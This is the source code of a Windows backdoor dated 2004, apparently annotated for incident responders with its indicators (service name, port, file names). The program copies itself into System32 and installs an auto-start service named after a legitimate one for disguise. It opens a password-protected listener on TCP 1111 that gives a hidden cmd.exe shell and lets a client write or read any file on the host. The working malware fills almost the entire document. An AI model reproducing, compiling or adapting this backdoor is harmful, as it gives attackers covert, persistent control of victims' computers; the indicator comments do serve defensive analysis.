//
//1. Service and Socket Code from http://www.msdn.micr...ary/default.asp
//2. CreatePipe and PeekNamedPipe read from Ipxodi code (thank's for your tutor Ipxodi)
//
//hei, i am new in VC++
//so, sorry if this code is very kiddie's ......
//
//This Yihaa Backdoor will Create Service name "Spoolsw", with Service display name "Perfomance Logs And alert"
//And Copy itself to "%SystemRoot%\System32\Spoolsw.exe"
//use socket, not WSASocket..........
//remove this backdoor :
//Delete HKLM>HARDWARE>SYSTEM>controlset001>service>spoolsw
//than restart your compie
//(don't forget del "%SystemRoot%\system32\spoolsw.exe")
//
#include "stdafx.h"
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <io.h>
#include <sys/stat.h>
#include <fcntl.h>
#pragma comment (lib, "Ws2_32.lib")
/* Wire strings sent to the client (Indonesian): "WRONG PASSWORD" and
 * "OK, PASSWORD CORRECT, COME IN". They are static and sent in plaintext,
 * so they are usable as-is as network signatures for this sample. */
char *passsalah ="\nPASSWORD SALAH..!!\n";
char *passoke ="\nOKE, PASSWORD BENAR, SILAHKAN MASUK..!!\n";
/* Login banner. It is not referenced anywhere in the visible code.
 * (The last literal is cut across two lines by the page extraction.) */
char *selamat ="\n===================================***--***===================================\n"
"= YIHAA BACKDOOR =\n"
"= ===***__***=== =\n"
"= COPYRIGHT 2004 BY BLAHPLOK =\n"
"===========================================================================
===\n";
/* SCM identifiers: the service name and a display name chosen to resemble
 * the legitimate "Performance Logs and Alerts" service. Both appear in the
 * registry once the service is created in main() and are host indicators. */
char namaservice[]="Spoolsw";
char namaservicedisply[]="Perfomance Logs and alert";
/* Hard-coded access password, matched with strstr() anywhere in the first
 * client message. */
#define PASS "4204"
/* Mode keywords matched in the second client message (Indonesian, named
 * from the client's point of view: cell = shell, kirim = send a file to
 * the host, terima = receive a file from the host). */
#define CELL "cell"
#define KIRIM "kirim"
#define TERIMA "terima"
/* Forward declarations: service control handler and service body. */
void WINAPI penghandle(DWORD);
void WINAPI servicemain(DWORD,LPTSTR*);
/*
 * Entry point: self-installs as a Windows service, then runs the service
 * body. Steps visible below:
 *   1. copy this executable to <system dir>\Spoolsw.exe,
 *   2. if no service "Spoolsw" exists, create an auto-start own-process
 *      service with ImagePath %SystemRoot%\System32\Spoolsw.exe, start it
 *      and exit,
 *   3. otherwise hand the process to the SCM dispatcher, falling back to a
 *      direct servicemain() call when not launched by the SCM.
 * Persistence indicators for responders: the service name and display name
 * from the globals above, the dropped binary path, and SERVICE_AUTO_START.
 * argc/argv are unused. No API return value is checked except the two
 * service handles.
 */
int main(int argc, char* argv[])
{
SC_HANDLE sch1, sch2;
/* Binary path recorded in the SCM (expanded by the SCM at start time). */
char namapath[]="%SystemRoot%\\System32\\Spoolsw.exe";
char sysdir[MAX_PATH];
char filename[256];
HMODULE gmh;
/* Resolve the system directory and this module's own file name ... */
GetSystemDirectory(sysdir,sizeof(sysdir));
gmh=GetModuleHandle(NULL);
GetModuleFileName(gmh,filename,sizeof(filename));
/* ... and drop a copy of itself as System32\Spoolsw.exe.
 * bFailIfExists=0, so an existing file at that path is overwritten. */
strcat(sysdir,"\\Spoolsw.exe");
CopyFile(filename,sysdir,0);
/* Dispatch table for the SCM: a single service whose entry is servicemain(). */
SERVICE_TABLE_ENTRY ste[]=
{
{namaservice,servicemain},{NULL,NULL}
};
/* Needs SC_MANAGER_ALL_ACCESS on the SCM; a NULL sch1 is not checked. */
sch1=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
sch2=OpenService(sch1,namaservice,SERVICE_START);
if(sch2)
{
/* Already installed: nothing more to do before dispatching. */
CloseServiceHandle(sch2);
}
else
{
if(GetLastError()==ERROR_SERVICE_DOES_NOT_EXIST)
{
/* Register persistence: own-process, auto-start at boot, default service
 * account (NULL account name = LocalSystem per the CreateService contract).
 * The call below is one statement wrapped across lines by the page extraction. */
sch2=CreateService(sch1,namaservice,namaservicedisply,SERVICE_ALL_ACCESS,SERVICE
_WIN32_OWN_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_NORMAL,namapath,NULL,NULL,NU
L
L,NULL,NULL);
if (sch2 !=NULL)
{
/* First run: start the installed copy and let this process exit. */
StartService(sch2,0,NULL);
CloseServiceHandle(sch1);
CloseServiceHandle(sch2);
return 0;
}
}
}
/* When started by the SCM this blocks in the dispatcher until the service
 * ends. When started any other way (e.g. interactively) the dispatcher
 * fails and the service body runs directly, without an SCM status handle. */
if(!StartServiceCtrlDispatcher(ste))
{
servicemain(0,NULL);
}
return(1);
}
/*
 * Service body. Reports RUNNING to the SCM, then listens on TCP port 1111
 * on every interface and serves one client at a time. Protocol as
 * implemented (plaintext, no encryption, authentication is a hard-coded
 * substring):
 *   - first message must contain "4204" somewhere, else the connection is
 *     rejected with the "wrong password" string;
 *   - second message selects a mode by substring: "cell" pipes an
 *     interactive cmd.exe over the socket, "kirim" writes a client-supplied
 *     path with client-supplied content, "terima" reads a client-supplied
 *     path and sends it back.
 * Indicators: a listener on 1111/tcp owned by Spoolsw.exe; cmd.exe spawned
 * by the service with redirected std handles; the scratch files
 * namafileyangditerima.txt and namafileyangdikirim.txt, created relative to
 * the process's current directory. The file modes accept any path the
 * service account can open, so they amount to arbitrary file write/read.
 * argc/argv are unused.
 */
void WINAPI servicemain(DWORD argc, LPTSTR *argv)
{
SERVICE_STATUS_HANDLE sth;
SERVICE_STATUS s_status;
unsigned int panjang;
unsigned int filekirim1;
unsigned int filekirim2;
FILE *terima1;
char *terima2;
char terima3[80];
char *TERIMA4;
int bytedibaca;
FILE *terima;
FILE *hg1;
char *hg2;
char hg3[80];
/* From here on the identifier FILE is this variable, not the stdio type. */
char *FILE;
/* 1,024,000-byte receive/transmit buffer on the stack; recv() never writes
 * a terminator into it, so the strstr() matches below scan it as-is. */
char buffer[1024000];
unsigned int files;
unsigned int file;
STARTUPINFO s_info;
SECURITY_ATTRIBUTES s_attrib;
HANDLE baca_std_keluar, tulis_std_keluar, baca_std_masuk, tulis_std_masuk;
unsigned long byteyangdibaca;
int sock1, sock2, ukuran, ret;
struct sockaddr_in alamat;
WSADATA wsdt;
/* Register the control handler and report RUNNING; only SHUTDOWN is
 * advertised as an accepted control. */
sth=RegisterServiceCtrlHandler(namaservice,penghandle);
memset(&s_status,0,sizeof(s_status));
s_status.dwServiceType=SERVICE_WIN32_OWN_PROCESS;
s_status.dwCurrentState=SERVICE_RUNNING;
s_status.dwControlsAccepted=SERVICE_ACCEPT_SHUTDOWN;
s_status.dwWin32ExitCode=NO_ERROR;
SetServiceStatus(sth,&s_status);
/* Listening socket: TCP/1111, s_addr=0 means INADDR_ANY (all interfaces).
 * bind() and socket() results are not checked. */
WSAStartup(MAKEWORD(2, 0), &wsdt);
sock1 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&alamat, 0, sizeof(alamat));
alamat.sin_family = AF_INET;
alamat.sin_port = htons(1111);
alamat.sin_addr.s_addr=0;
bind(sock1, (struct sockaddr*)&alamat, sizeof(alamat));
if (listen(sock1,5))
{
return;
}
/* Accept loop: one client at a time, never exits on its own. */
while(1)
{
ukuran = sizeof(alamat);
sock2 = accept(sock1, (struct sockaddr*)&alamat,&ukuran);
/* A failed accept() returns a non-zero INVALID_SOCKET, so this test does
 * not detect accept errors. */
if(sock2)
{
/* Message 1: password check by substring anywhere in the received data. */
recv(sock2,buffer,sizeof(buffer),0);
if(!(strstr(buffer,PASS)))
{
send(sock2,passsalah,strlen(passsalah),0);
closesocket(sock2);
}
else
{
/* Message 2: mode keyword. The three checks below are independent ifs,
 * so the buffer is re-tested for each keyword in turn. */
send(sock2,passoke,strlen(passoke),0);
recv(sock2,buffer,sizeof(buffer),0);
if(strstr(buffer,CELL))
{
/* Interactive shell: two inheritable anonymous pipes wired to a hidden
 * cmd.exe, socket data relayed in both directions. */
s_attrib.nLength = sizeof(SECURITY_ATTRIBUTES);
s_attrib.bInheritHandle = TRUE;
s_attrib.lpSecurityDescriptor = NULL;
CreatePipe(&baca_std_keluar,&tulis_std_keluar,&s_attrib,0);
CreatePipe(&baca_std_masuk,&tulis_std_masuk,&s_attrib,0);
GetStartupInfo(&s_info);
s_info.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
s_info.wShowWindow = SW_HIDE;
s_info.hStdOutput = s_info.hStdError = tulis_std_keluar;
s_info.hStdInput = baca_std_masuk;
/* cmd.exe inherits the pipe handles; it runs under the service's own token.
 * The same s_info struct is passed as the PROCESS_INFORMATION output, so the
 * child's handles/ids are written over the STARTUPINFO and never used. */
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &s_info, (PROCESS_INFORMATION *)&s_info);
while(1)
{
/* Poll the child's stdout every 100 ms; when it is empty, block on the socket. */
Sleep(100);
ret=PeekNamedPipe(baca_std_keluar,buffer,sizeof(buffer),&byteyangdibaca,0,0);
if(!byteyangdibaca)
{
byteyangdibaca = recv(sock2,buffer,sizeof(buffer),0);
if(byteyangdibaca <= 0) break;
/* Forward client input to cmd.exe's stdin. */
ret = WriteFile(tulis_std_masuk,buffer,byteyangdibaca,&byteyangdibaca,0);
/* "exit" closes the socket here; the loop itself ends on the next failed
 * recv()/send(). The child process is not terminated explicitly. */
if(byteyangdibaca >= 4 && buffer[0]=='e'&& buffer[1]=='x'&& buffer[2]=='i'&& buffer[3]=='t')
{
closesocket(sock2);
}
if(!ret) break;
}
else
{
/* Forward cmd.exe output to the client. */
ret = ReadFile(baca_std_keluar,buffer,byteyangdibaca,&byteyangdibaca,0);
if(!ret) break;
ret = send(sock2,buffer,byteyangdibaca,0);
if(ret <= 0) break;
}
}
}
/* After a shell session the checks below run against whatever the
 * session left in buffer. */
if(strstr(buffer,KIRIM))
{
/* File upload to the host. The next client message is written to a
 * scratch file, read back with fgets() (first line, max 79 chars), and
 * used unvalidated as the destination path (created/truncated). */
FILE="namafileyangditerima.txt";
file=open(FILE,O_WRONLY|O_CREAT|O_TRUNC|O_BINARY,S_IREAD|S_IWRITE);
files=recv(sock2,buffer,sizeof(buffer),0);
write(file,buffer,files);
close(file);
Sleep(1000);
hg1=fopen("namafileyangditerima.txt","rb");
hg2=fgets(hg3,80,hg1);
strcpy(hg3,hg2);
FILE=hg3;
file=open(FILE,O_WRONLY|O_CREAT|O_TRUNC|O_BINARY,S_IREAD|S_IWRITE);
fclose(hg1);
/* Content loop: the descriptor is closed on the first pass, so only the
 * first received chunk reaches the file; the loop runs until recv()
 * returns 0 (panjang is unsigned). */
panjang=1024000;
while(panjang>0)
{
panjang=recv(sock2,buffer,sizeof(buffer),0);
write(file,buffer,panjang);
close(file);
}
}
if(strstr(buffer,TERIMA))
{
/* File download from the host: one message is discarded, the next is
 * stored, read back as a single line and opened unvalidated as the source
 * path; its contents are streamed to the client, then the socket closes. */
recv(sock2,buffer,sizeof(buffer),0);
TERIMA4="namafileyangdikirim.txt";
filekirim1=open(TERIMA4,O_WRONLY|O_CREAT|O_TRUNC|O_BINARY,S_IREAD|S_IWRITE);
filekirim2=recv(sock2,buffer,sizeof(buffer),0);
write(filekirim1,buffer,filekirim2);
close(filekirim1);
Sleep(100);
terima1=fopen("namafileyangdikirim.txt","rb");
terima2=fgets(terima3,80,terima1);
strcpy(terima3,terima2);
TERIMA4=terima3;
terima=fopen(TERIMA4,"r+b");
fclose(terima1);
if(terima)
{
while((bytedibaca=fread(buffer,1,sizeof(buffer),terima))>0)
{
send(sock2,buffer,bytedibaca,0);
}
fclose(terima);
closesocket(sock2);
}
}
else
{
/* Pairs with the TERIMA test only: any non-"terima" path ends here. */
closesocket(sock2);
}
}
}
}
/* Unreachable: the accept loop above never exits. */
closesocket(sock2);
}
/*
 * Service control handler registered in servicemain().
 * The condition uses a single '=' (assignment), so it is always true and
 * any control request — stop, pause, shutdown, interrogate — terminates
 * the process at once, without reporting a state change to the SCM.
 * For responders: a plain service stop request is enough to end the listener.
 */
void WINAPI penghandle(DWORD yess)
{
if (yess=SERVICE_CONTROL_SHUTDOWN)
{
ExitProcess(0);
}
}
